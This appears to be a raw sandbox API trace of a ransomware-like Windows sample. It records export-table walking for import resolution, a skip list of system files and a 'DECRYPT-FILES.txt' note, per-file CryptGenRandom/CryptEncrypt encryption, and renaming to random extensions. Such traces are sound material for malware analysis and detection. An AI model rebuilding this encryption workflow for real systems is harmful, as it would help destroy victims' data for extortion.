lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.437] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.437] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.437] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.437] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.437] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.437] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.437] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.437] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.437] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.437] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.438] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.438] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.438] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.438] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.438] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.438] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.438] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.438] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.438] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.438] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.438] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.438] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.438] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.438] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.438] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.438] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.438] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.438] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.439] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.439] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.439] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.439] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.439] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.439] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.439] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.439] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.439] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.439] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.439] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.439] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.439] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.439] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.439] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.439] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.439] lstrlenA (lpString="DELETEATOM") returned 10 [0082.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.439] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.440] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.440] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.440] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.440] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.440] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.440] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.440] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.440] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.440] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.440] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.440] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.440] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.440] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.440] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.440] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.440] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.440] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.441] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.441] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.441] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.441] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.441] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.441] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.441] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.441] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.441] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.441] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.441] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.441] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.441] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.441] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.441] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.441] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.441] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.441] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.442] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.442] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.442] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.442] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.442] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.442] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.442] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.442] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.442] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.442] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ra6Yg2CQeu7kE3KQ_0.mp3") returned 68 [0082.442] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ra6Yg2CQeu7kE3KQ_0.mp3.14oWJo") returned 75 [0082.442] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ra6Yg2CQeu7kE3KQ_0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ra6yg2cqeu7ke3kq_0.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ra6Yg2CQeu7kE3KQ_0.mp3.14oWJo" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ra6yg2cqeu7ke3kq_0.mp3.14owjo"), dwFlags=0x0) returned 1 [0082.443] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.443] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.444] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.444] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x99c4bc30, ftCreationTime.dwHighDateTime=0x1d4ccf8, ftLastAccessTime.dwLowDateTime=0x1bafa770, ftLastAccessTime.dwHighDateTime=0x1d4cb6c, ftLastWriteTime.dwLowDateTime=0x1bafa770, ftLastWriteTime.dwHighDateTime=0x1d4cb6c, nFileSizeHigh=0x0, nFileSizeLow=0xd698, dwReserved0=0x0, dwReserved1=0x0, cFileName="RVu8ePGXop9R2.mp3", cAlternateFileName="RVU8EP~1.MP3")) returned 1 [0082.444] lstrcmpiW (lpString1="RVu8ePGXop9R2.mp3", lpString2="DECRYPT-FILES.txt") returned 1 [0082.444] lstrcmpiW (lpString1="RVu8ePGXop9R2.mp3", lpString2="autorun.inf") returned 1 [0082.444] lstrcmpiW (lpString1="RVu8ePGXop9R2.mp3", lpString2="boot.ini") returned 1 [0082.444] lstrcmpiW (lpString1="RVu8ePGXop9R2.mp3", lpString2="desktop.ini") returned 1 [0082.444] lstrcmpiW (lpString1="RVu8ePGXop9R2.mp3", lpString2="ntuser.dat") returned 1 [0082.444] lstrcmpiW (lpString1="RVu8ePGXop9R2.mp3", lpString2="iconcache.db") returned 1 [0082.444] lstrcmpiW (lpString1="RVu8ePGXop9R2.mp3", lpString2="bootsect.bak") returned 1 [0082.444] lstrcmpiW (lpString1="RVu8ePGXop9R2.mp3", lpString2="ntuser.dat.log") returned 1 [0082.444] lstrcmpiW (lpString1="RVu8ePGXop9R2.mp3", lpString2="thumbs.db") returned -1 [0082.444] lstrcmpiW (lpString1="RVu8ePGXop9R2.mp3", lpString2="Bootfont.bin") returned 1 [0082.444] lstrlenW (lpString="RVu8ePGXop9R2.mp3") returned 17 [0082.444] lstrcmpiW (lpString1="mp3", lpString2="lnk") returned 1 [0082.444] lstrcmpiW (lpString1="mp3", lpString2="exe") returned 1 [0082.444] lstrcmpiW (lpString1="mp3", lpString2="sys") returned -1 [0082.444] lstrcmpiW (lpString1="mp3", lpString2="dll") returned 1 [0082.444] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0082.444] lstrlenW (lpString="RVu8ePGXop9R2.mp3") returned 17 [0082.444] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0082.444] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="RVu8ePGXop9R2.mp3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RVu8ePGXop9R2.mp3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RVu8ePGXop9R2.mp3" [0082.444] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.445] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RVu8ePGXop9R2.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\rvu8epgxop9r2.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0082.445] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=54936) returned 1 [0082.445] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0082.445] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.445] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.445] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.445] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.445] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0082.446] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.447] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.447] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.448] CloseHandle (hObject=0x444) returned 1 [0082.448] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.448] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0082.449] CloseHandle (hObject=0x0) returned 0 [0082.449] CloseHandle (hObject=0x440) returned 1 [0082.449] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.449] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.449] GetTickCount () returned 0x114d163 [0082.449] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.449] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.450] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.450] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.450] lstrlenA (lpString="kernel32.dll") returned 12 [0082.450] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.450] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.450] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.450] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.450] lstrlenA (lpString="ADDATOMA") returned 8 